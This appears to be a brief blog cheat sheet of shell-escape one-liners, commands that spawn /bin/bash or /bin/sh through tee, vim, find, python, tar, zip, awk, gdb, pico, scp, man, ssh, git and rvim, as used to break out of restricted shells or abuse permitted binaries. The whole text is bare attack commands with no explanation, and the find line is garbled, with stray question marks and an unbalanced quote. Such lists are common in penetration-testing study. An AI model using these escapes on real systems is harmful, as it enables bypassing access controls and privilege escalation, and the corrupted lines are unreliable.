Shell escape
Mar
24
shell escape…
tee
echo "kod" | tee script.sh
vi/vim
:set shell=/bin/bash :shell : ! /bin/bash
find
find / -name xxxx ?exec /bin/awk ?BEGIN {system("/bin/sh")}' \;
python
python -c "import os; os.system('/bin/bash')"
tar
tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/bash
zip
zip /tmp/xx.zip /tmp/xx -T --unzip-command="sh -c /bin/bash"
awk
awk 'BEGIN{system("/bin/bash")}'
gdb
gdb -q !/bin/bash shell
pico
pico -s "/bin/bash" /bin/bash ^T
scp
scp -S /tmp/xxx.sh x:y
man
man man !/bin/bash <Enter>
ssh
ssh -o ProxyCommand="sh -c /tmp/xxx.sh" 127.0.0.1
git
git help status !/bin/bash <Enter>
rvim (+python)
:python import os; os.system("/bin/bash")